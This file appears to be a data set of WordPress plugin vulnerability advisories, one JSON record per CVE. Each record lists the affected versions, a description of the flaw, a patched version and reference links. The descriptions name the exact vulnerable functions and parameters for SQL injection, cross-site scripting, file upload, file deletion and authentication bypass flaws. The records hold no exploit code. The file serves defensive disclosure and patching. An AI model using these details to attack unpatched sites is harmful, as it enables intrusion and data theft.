{"CVE_ID":"CVE-2024-10664","slug":"basepress","versionImpact":"2.16.3.3","versionEndExcluding":"2.16.3.4","description":"The Knowledge Base documentation & wiki plugin \u2013 BasePress Docs plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the basepress_db_posts_update() function in all versions up to, and including, 2.16.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the database.","recommendation":"Update to version 2.16.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201489%40basepress&new=3201489%40basepress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201489%40basepress&new=3201489%40basepress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa6f3c2-0e45-4243-a26d-ba1c702fbe11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa6f3c2-0e45-4243-a26d-ba1c702fbe11?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9217","slug":"currency-switcher-woocommerce","versionImpact":"2.16.2","versionEndExcluding":"2.16.3","description":"The Currency Switcher for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.16.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.16.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher-woocommerce\\\/trunk\\\/includes\\\/functions\\\/alg-switcher-selector-functions.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher-woocommerce\\\/trunk\\\/includes\\\/functions\\\/alg-switcher-selector-functions.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3357892e-c047-406b-8914-018ea966e799?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3357892e-c047-406b-8914-018ea966e799?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4045","slug":"optinmonster","versionImpact":"2.16.1","versionEndExcluding":"2.16.2","description":"The Popup Builder by OptinMonster \u2013 WordPress Popups for Optins, Email Newsletters and Lead Generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018campaign_id\u2019 parameter in versions up to, and including, 2.16.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.16.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4dfeb49-38d3-495d-af96-d67a29b339fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4dfeb49-38d3-495d-af96-d67a29b339fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optinmonster\\\/tags\\\/2.16.0\\\/OMAPI\\\/Elementor\\\/Widget.php#L532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optinmonster\\\/tags\\\/2.16.0\\\/OMAPI\\\/Elementor\\\/Widget.php#L532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087905\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087905\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46068","slug":"xqueue-maileon","versionImpact":"2.16.0","versionEndExcluding":"2.16.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in XQueue GmbH Maileon for WordPress plugin <=\u00a02.16.0 versions.","recommendation":"Update to version 2.16.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/xqueue-maileon\\\/wordpress-maileon-plugin-2-16-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/xqueue-maileon\\\/wordpress-maileon-plugin-2-16-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8803","slug":"bulk-noindex-nofollow-toolkit-by-mad-fish","versionImpact":"2.15","versionEndExcluding":"2.16","description":"The Bulk NoIndex & NoFollow Toolkit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.15. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6e1cc0d-2c5f-4e34-bd19-d7c90cd4dff6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6e1cc0d-2c5f-4e34-bd19-d7c90cd4dff6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-noindex-nofollow-toolkit-by-mad-fish\\\/trunk\\\/inc\\\/bulk-noindex-toolkit-class.php?rev=3047303#L452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-noindex-nofollow-toolkit-by-mad-fish\\\/trunk\\\/inc\\\/bulk-noindex-toolkit-class.php?rev=3047303#L452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157176\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157176\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13365","slug":"security-malware-firewall","versionImpact":"2.149","versionEndExcluding":"2.150","description":"The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to arbitrary file uploads due to the plugin uploading and extracting .zip archives when scanning them for malware through the checkUploadedArchive() function  in all versions up to, and including, 2.149. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.150, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229205\\\/security-malware-firewall#file527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229205\\\/security-malware-firewall#file527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fa30fa2-6c42-4e5f-a0b5-8711ce5d8121?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fa30fa2-6c42-4e5f-a0b5-8711ce5d8121?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12032","slug":"tourfic","versionImpact":"2.15.3","versionEndExcluding":"2.15.4","description":"The Tourfic \u2013 Ultimate Hotel Booking, Travel Booking & Apartment Booking WordPress Plugin | WooCommerce Booking plugin for WordPress is vulnerable to SQL Injection via the 'enquiry_id' parameter of the 'tf_enquiry_reply_email_callback' function in all versions up to, and including, 2.15.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.15.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tourfic\\\/tags\\\/2.14.1\\\/inc\\\/Core\\\/Enquiry.php#L990\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tourfic\\\/tags\\\/2.14.1\\\/inc\\\/Core\\\/Enquiry.php#L990\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207686\\\/tourfic\\\/trunk\\\/inc\\\/Core\\\/Enquiry.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207686\\\/tourfic\\\/trunk\\\/inc\\\/Core\\\/Enquiry.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35eebcc8-a6bf-4cbb-9cc6-f49bd1625d6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35eebcc8-a6bf-4cbb-9cc6-f49bd1625d6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10015","slug":"twitter-plugin","versionImpact":"2.14","versionEndExcluding":"2.15","description":"A vulnerability was found in BestWebSoft Twitter Plugin up to 2.14 on WordPress. It has been classified as problematic. Affected is the function twttr_settings_page of the file twitter.php of the component Settings Page. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 2.15 is able to address this issue. The name of the patch is a6d4659cbb2cbf18ccb0fb43549d5113d74e0146. It is recommended to upgrade the affected component. VDB-230154 is the identifier assigned to this vulnerability.","recommendation":"Update to version 2.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/a6d4659cbb2cbf18ccb0fb43549d5113d74e0146\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/a6d4659cbb2cbf18ccb0fb43549d5113d74e0146\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230154\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230154\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230154\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230154\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10570","slug":"security-malware-firewall","versionImpact":"2.145","versionEndExcluding":"2.145.1","description":"The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.145.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-malware-firewall\\\/tags\\\/2.145\\\/lib\\\/CleantalkSP\\\/Common\\\/RemoteCalls.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-malware-firewall\\\/tags\\\/2.145\\\/lib\\\/CleantalkSP\\\/Common\\\/RemoteCalls.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13562","slug":"jc-importer","versionImpact":"2.14.5","versionEndExcluding":"2.14.6","description":"The Import WP \u2013 Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.14.5 via the uploads directory. This makes it possible for unauthenticated attackers to extract sensitive data  stored insecurely in the \/wp-content\/uploads\/ directory which can contain information like imported or local user data and files.","recommendation":"Update to version 2.14.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226495\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226495\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6d69ffd-bb39-4fcc-9444-27d1a901e7c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6d69ffd-bb39-4fcc-9444-27d1a901e7c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2332","slug":"wp-ultimate-exporter","versionImpact":"2.13","versionEndExcluding":"2.14","description":"The Export All Posts, Products, Orders, Refunds & Users plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.13 via deserialization of untrusted input in the 'returnMetaValueAsCustomerInput' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L3332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L3332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257504\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257504\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9546ab46-737c-4bd3-9542-8ab1b776b3ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9546ab46-737c-4bd3-9542-8ab1b776b3ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12919","slug":"paid-member-subscriptions","versionImpact":"2.13.7","versionEndExcluding":"2.13.8","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.13.7. This is due to the pms_pb_payment_redirect_link function using the user-controlled value supplied via the 'pms_payment_id' parameter to authenticate users without any further identity validation. This makes it possible for unauthenticated attackers with knowledge of a valid payment ID to log in as any user who has made a purchase on the targeted site.","recommendation":"Update to version 2.13.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214706\\\/paid-member-subscriptions\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214706\\\/paid-member-subscriptions\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a4fa4d-a7d2-4890-b0f5-5fe69bc5e7ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a4fa4d-a7d2-4890-b0f5-5fe69bc5e7ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11291","slug":"paid-member-subscriptions","versionImpact":"2.13.4","versionEndExcluding":"2.13.5","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.","recommendation":"Update to version 2.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206206\\\/paid-member-subscriptions\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206206\\\/paid-member-subscriptions\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e207f1a3-2ca5-46d1-91a9-89652451266c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e207f1a3-2ca5-46d1-91a9-89652451266c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13925","slug":"klarna-checkout-for-woocommerce","versionImpact":"2.13.4","versionEndExcluding":"2.13.5","description":"The Klarna Checkout for WooCommerce WordPress plugin before 2.13.5 exposes an unauthenticated WooCommerce Ajax endpoint that allows an attacker to flood the log files with data at the maximum size allowed for a POST parameter per request. This can result in rapid consumption of disk space, potentially filling the entire disk.","recommendation":"Update to version 2.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6aebb52f-d74a-4043-86c4-c24579f24ef4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6aebb52f-d74a-4043-86c4-c24579f24ef4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7782","slug":"bit-form","versionImpact":"2.13.4","versionEndExcluding":"2.13.5","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the iconRemove function in versions 2.0 to 2.13.4. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4da8ead-326f-4c93-b56d-8bfa643d7906?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4da8ead-326f-4c93-b56d-8bfa643d7906?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.0\\\/includes\\\/Admin\\\/AdminAjax.php#L1271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.0\\\/includes\\\/Admin\\\/AdminAjax.php#L1271\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6123","slug":"bit-form","versionImpact":"2.12.3","versionEndExcluding":"2.13.4","description":"The Bit Form plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'iconUpload' function in all versions up to, and including, 2.12.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b255f-d775-4bd5-892e-42bf82dd5632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b255f-d775-4bd5-892e-42bf82dd5632?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.12.2\\\/includes\\\/Admin\\\/AdminAjax.php#L1176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.12.2\\\/includes\\\/Admin\\\/AdminAjax.php#L1176\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10703","slug":"registrations-for-the-events-calendar","versionImpact":"2.13.3","versionEndExcluding":"2.13.4","description":"The Registrations for the Events Calendar  WordPress plugin before 2.13.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5601ac03-09e4-4b4e-b03e-98323bd36dba\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5601ac03-09e4-4b4e-b03e-98323bd36dba\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7780","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to generic SQL Injection via the id parameter in versions 2.0 to 2.13.9 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73b6b22a-4699-4307-8a03-148dd9e95d36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73b6b22a-4699-4307-8a03-148dd9e95d36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L2387\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L2387\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Core\\\/Messages\\\/EmailTemplateHandler.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Core\\\/Messages\\\/EmailTemplateHandler.php#L93\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7777","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file read and deletion due to insufficient file path validation in multiple functions in versions 2.0 to 2.13.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to read and delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb128d-0163-4a8e-9591-87352f74c3ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4deb128d-0163-4a8e-9591-87352f74c3ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L852\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L852\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L875\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L875\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L898\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.3\\\/includes\\\/Admin\\\/AdminAjax.php#L898\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7775","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary JavaScript file uploads due to missing input validation in the addCustomCode function in versions 2.0 to 2.13.9. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary JavaScript files to the affected site's server.","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3936d7dc-840e-41fc-8af4-db40c0cff660?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3936d7dc-840e-41fc-8af4-db40c0cff660?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1314\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.6\\\/includes\\\/Admin\\\/AdminAjax.php#L1314\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7702","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to generic SQL Injection via the entryID parameter in versions 2.0 to 2.13.9 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries to already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.13.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07847ba1-cbce-4d81-bd24-46887ac31a5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07847ba1-cbce-4d81-bd24-46887ac31a5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L944\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L944\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10261","slug":"paid-member-subscriptions","versionImpact":"2.13.0","versionEndExcluding":"2.13.1","description":"The The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.13.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.13.1, or a newer patched 